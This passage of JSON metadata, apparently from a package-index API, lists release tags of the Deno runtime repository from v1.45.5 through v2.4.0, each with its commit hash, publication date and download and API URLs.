v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"pu